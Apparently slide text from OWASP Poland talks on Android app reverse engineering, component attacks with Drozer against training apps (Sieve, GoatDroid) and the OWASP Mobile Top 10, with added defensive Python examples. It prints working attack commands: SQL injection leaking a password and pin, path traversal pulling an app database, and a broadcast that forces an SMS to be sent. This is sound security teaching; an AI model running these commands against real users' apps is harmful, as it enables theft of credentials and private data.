• Disassembling – low level – assembly-like code (Smali)
• Why disassemble rather than decompile?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler on the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – JD-GUI is a closed-source Java decompiler; Luyten is an open-source front end for the Procyon decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but produce different OUTPUT
[Screenshots: JD-GUI and Luyten output]
Disassembling
DEX → Smali
• Apktool
  – Open-source Java tool for reverse engineering Android apps
  – Transforms binary Dalvik bytecode (DEX) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Drozer
The best thing about drozer: you don't need to write your own app to interact with other apps :)
  dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed by default in AppUse along with adb, so it's enough to just "click and play".
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app.
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with Intents it's possible to achieve the following:
  – Modify data in the background
  – Trick the user
  – Leak sensitive information
Activity components attacks
• General hijacking scheme
  [Diagram: components A, B and a malicious E; an Intent sent by A and meant for B is picked up by E, which declared a matching filter]
• Results of an attack:
  – The malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation or implementing it in an insecure way
• A few reminders (yeah, I know you know it...)
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea...
Broken Cryptography - example
• ...but not when you're hardcoding the password to decrypt it in the code...
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
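To make the last two mitigations concrete, here is an added example (not from the slides) of what "password-based encryption instead of a stored key" looks like in practice: the key is derived with PBKDF2-HMAC-SHA256 from the user's password and a random per-install salt, only the salt, iteration count and a key verifier are persisted, and the key itself never touches disk. The hardcoded key constant and the vault header format are constructed for the example; on Android the same derivation is available through `SecretKeyFactory` with `PBKDF2WithHmacSHA256`.

```python
import base64
import hashlib
import hmac
import os
from typing import Dict, Optional

# The anti-pattern from the slide: a fixed key that ships inside the apk, identical on every
# device and trivially recovered with dex2jar + JD-GUI. Constructed value for illustration.
HARDCODED_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")

ITERATIONS = 100_000   # tune to the slowest device you support
KEY_LEN = 32           # 256-bit key
VERIFIER_LABEL = b"vault-key-check"


def derive_key(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """PBKDF2-HMAC-SHA256: the key exists only in memory while the user has typed the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=KEY_LEN)


def create_vault_header(password: str) -> Dict[str, str]:
    """What gets persisted: a random salt, the iteration count and a key verifier. Never the key."""
    salt = os.urandom(16)
    key = derive_key(password, salt)
    verifier = hmac.new(key, VERIFIER_LABEL, "sha256").digest()
    return {
        "salt": base64.b64encode(salt).decode(),
        "iterations": str(ITERATIONS),
        "verifier": base64.b64encode(verifier).decode(),
    }


def unlock(header: Dict[str, str], password: str) -> Optional[bytes]:
    """Re-derive the key; return it only if the verifier matches (constant-time compare)."""
    salt = base64.b64decode(header["salt"])
    key = derive_key(password, salt, int(header["iterations"]))
    expected = base64.b64decode(header["verifier"])
    actual = hmac.new(key, VERIFIER_LABEL, "sha256").digest()
    return key if hmac.compare_digest(actual, expected) else None


if __name__ == "__main__":
    hdr = create_vault_header("correct horse battery staple")
    print("stored on device:", hdr)
    print("unlock with right password:", unlock(hdr, "correct horse battery staple") is not None)
    print("unlock with wrong password:", unlock(hdr, "hunter2") is not None)
```

The verifier is an HMAC under the derived key rather than a hash of the password, so an attacker who pulls the header with `adb pull` still has to run the full PBKDF2 work factor per guess, and nothing in the header reveals the key for a different install's salt.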
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
– Other applications via intent/content provider
– Shared file
– Server response
– Third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running a new activity, etc.) via special objects called Intents
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections: dz> run scanner.provider.injection -a <package_name>
• Data path traversal: dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
– a session expires (copy a cookie and try to use it after 30 minutes)
– a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
– you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"...
• ...but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts... 71.56 seconds
– http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate sessions on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
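The four mitigations fit in one small server-side component. The following is an added example (not from the slides): a session store that issues 256-bit tokens from the OS CSPRNG, expires them after a configurable TTL, destroys every older session of a user when the authentication state changes (a new login), and purges unused tokens; the device-ID-derived token from the "how to find" slide is shown as the anti-pattern it replaces. The `SessionStore` class and its method names are constructed for this example.

```python
import hashlib
import secrets
from typing import Dict, Optional


class SessionStore:
    """Server-side session table keyed by an unguessable token (constructed example)."""

    def __init__(self, ttl_seconds: int):
        self.ttl = ttl_seconds
        self._sessions: Dict[str, dict] = {}   # token -> {"user": ..., "expires": ...}

    def create(self, user: str, now: float) -> str:
        token = secrets.token_urlsafe(32)      # 256 bits from the OS CSPRNG, URL-safe base64
        self._sessions[token] = {"user": user, "expires": now + self.ttl}
        return token

    def validate(self, token: str, now: float) -> Optional[str]:
        """Return the user bound to token, or None if unknown or expired (expired ones are dropped)."""
        s = self._sessions.get(token)
        if s is None:
            return None
        if now >= s["expires"]:
            del self._sessions[token]
            return None
        return s["user"]

    def invalidate(self, token: str) -> None:
        """Explicit logout: the token stops working server-side, whatever the client keeps."""
        self._sessions.pop(token, None)

    def login(self, user: str, now: float) -> str:
        """Authentication state change: every older session of this user dies before a new one is issued."""
        for tok in [t for t, s in self._sessions.items() if s["user"] == user]:
            del self._sessions[tok]
        return self.create(user, now)

    def purge_expired(self, now: float) -> int:
        """Housekeeping for the 'destroy all unused session tokens' rule; returns how many were removed."""
        dead = [t for t, s in self._sessions.items() if now >= s["expires"]]
        for t in dead:
            del self._sessions[t]
        return len(dead)

    def active_count(self) -> int:
        return len(self._sessions)


def device_id_token(device_id: str) -> str:
    """The anti-pattern from the slide: a token anyone who knows (or guesses) the device ID can recompute."""
    return hashlib.sha256(device_id.encode()).hexdigest()


if __name__ == "__main__":
    store = SessionStore(ttl_seconds=1800)
    t = store.login("alice", now=0)
    print("valid at t+100s:", store.validate(t, now=100))
    print("valid at t+1800s:", store.validate(t, now=1800))
    print("device-id token is deterministic:", device_id_token("abc") == device_id_token("abc"))
```

Time is passed in explicitly (`now`) so the expiry and purge behaviour can be exercised deterministically; in production it would be `time.time()` at the call site.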
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
– APKOptic
– Astro File Manager
• Using ADB
• Using APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
(diagram: DEX → JAR → JAVA)
Decompiling – Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
(diagram: DEX → SMALI)
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar: java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Drozer: it is installed in the default package of AppUse together with adb, so it's enough to just "click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it via intents it's possible to achieve the following:
– Modify data in the background
– Trick the user
– Leak sensitive information
Activity components attacks
• General hijacking scheme
• Results of an attack:
– A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
– Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
(figure: general hijacking scheme)
Activity components attacks
• List and launch exported activities
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although they generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack)
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
• What info can they hold?
– User's phone numbers
– Passwords
– SMS
• And one of the main problems is, again, permissions
dz> run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database
– Just query it – dz> run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
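The two Drozer calls above work because the provider's `query()` splices the caller-supplied projection and selection straight into the SQL string. The following added example (not Sieve's code, not from the slides) models that in plain SQLite so the failure and the fix can be seen side by side: `vulnerable_query` reproduces both the syntax error on `'` and the `* FROM Key--` projection trick, while `hardened_query` whitelists projection columns, fixes the WHERE column and binds the filter value the way Android's `selectionArgs` does. Table names follow the slide; the rows are constructed.

```python
import sqlite3
from typing import List, Sequence, Tuple


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the provider's SQLite file; all rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, "
                 "username TEXT, password TEXT)")
    conn.execute("CREATE TABLE Key (Password TEXT, pin TEXT)")
    conn.executemany("INSERT INTO Passwords (service, username, password) VALUES (?, ?, ?)",
                     [("mail", "bob", "b0bpass"), ("bank", "alice", "al1cepass")])
    conn.execute("INSERT INTO Key VALUES ('thisismypassword', '9876')")
    return conn


def vulnerable_query(conn: sqlite3.Connection, projection: str, selection: str) -> List[Tuple]:
    """Models a provider query() that splices the caller's projection and selection into SQL.
    A projection of "* FROM Key--" turns the statement into SELECT * FROM Key (rest commented out)."""
    sql = f"SELECT {projection} FROM Passwords WHERE ({selection})"
    return conn.execute(sql).fetchall()


ALLOWED_COLUMNS = ("_id", "service", "username")   # the password column is never exposed


def hardened_query(conn: sqlite3.Connection, projection: Sequence[str], service: str) -> List[Tuple]:
    """Whitelist the projection, keep the WHERE column fixed, and bind the value (selectionArgs)."""
    cols = [c for c in projection if c in ALLOWED_COLUMNS]
    if not cols:
        raise ValueError("no permitted columns requested")
    sql = f"SELECT {', '.join(cols)} FROM Passwords WHERE service = ?"
    return conn.execute(sql, (service,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    try:
        vulnerable_query(db, "*", "'")
    except sqlite3.OperationalError as e:
        print("vulnerable, selection \"'\":", e)
    print("vulnerable, projection \"* FROM Key--\":", vulnerable_query(db, "* FROM Key--", "1=1"))
    print("hardened, same payload as value:", hardened_query(db, ["username"], "'"))
    print("hardened, normal use:", hardened_query(db, ["username"], "mail"))
```

In an Android provider the same shape is `SQLiteQueryBuilder` with `setProjectionMap()` plus `setStrict(true)`, and a `selectionArgs` array instead of a formatted `selection` string.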
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
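The `FileBackupProvider` above serves any path the app itself can read because its `openFile()` builds a `File` straight from the URI path. The following added example (not Sieve's code, not from the slides) models that provider in Python beside a hardened variant that canonicalises the requested path and refuses anything that resolves outside the export root, which also covers `..` sequences and symlinks. The sandbox layout is constructed in a temporary directory so the example runs offline.

```python
import os
import tempfile


class FileBackupProvider:
    """Models the openFile() of a file-serving provider; constructed example, not Sieve's code."""

    def __init__(self, root: str):
        self.root = os.path.realpath(root)

    def open_file_vulnerable(self, uri_path: str) -> bytes:
        # Mirrors `new File(uri.getPath())` with no containment check: any readable path is served.
        with open(uri_path, "rb") as f:
            return f.read()

    def open_file_hardened(self, uri_path: str) -> bytes:
        # Resolve symlinks and '..' first, then require the result to stay under the export root.
        candidate = os.path.realpath(os.path.join(self.root, uri_path.lstrip("/")))
        if os.path.commonpath([self.root, candidate]) != self.root:
            raise PermissionError(f"path escapes export root: {uri_path}")
        with open(candidate, "rb") as f:
            return f.read()


def make_sandbox():
    """Constructed on-disk layout: an export root with one backup file, and a secret outside it."""
    base = tempfile.mkdtemp(prefix="provider-demo-")
    root = os.path.join(base, "backups")
    os.makedirs(root)
    with open(os.path.join(root, "notes.txt"), "wb") as f:
        f.write(b"backup ok")
    outside = os.path.join(base, "secret.db")
    with open(outside, "wb") as f:
        f.write(b"SQLite format 3")
    return root, outside


if __name__ == "__main__":
    root, outside = make_sandbox()
    provider = FileBackupProvider(root)
    print("vulnerable, absolute path outside root:", provider.open_file_vulnerable(outside))
    print("hardened, file inside root:", provider.open_file_hardened("notes.txt"))
    try:
        provider.open_file_hardened("../secret.db")
    except PermissionError as e:
        print("hardened, traversal attempt:", e)
```

On Android the equivalent check is `File.getCanonicalPath()` on the requested file compared against the canonical path of the directory you intend to export, done before `ParcelFileDescriptor.open()`.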
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "Battery Low", "boot completed", "headset plug", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Broadcast receivers attacks
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
...
<uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
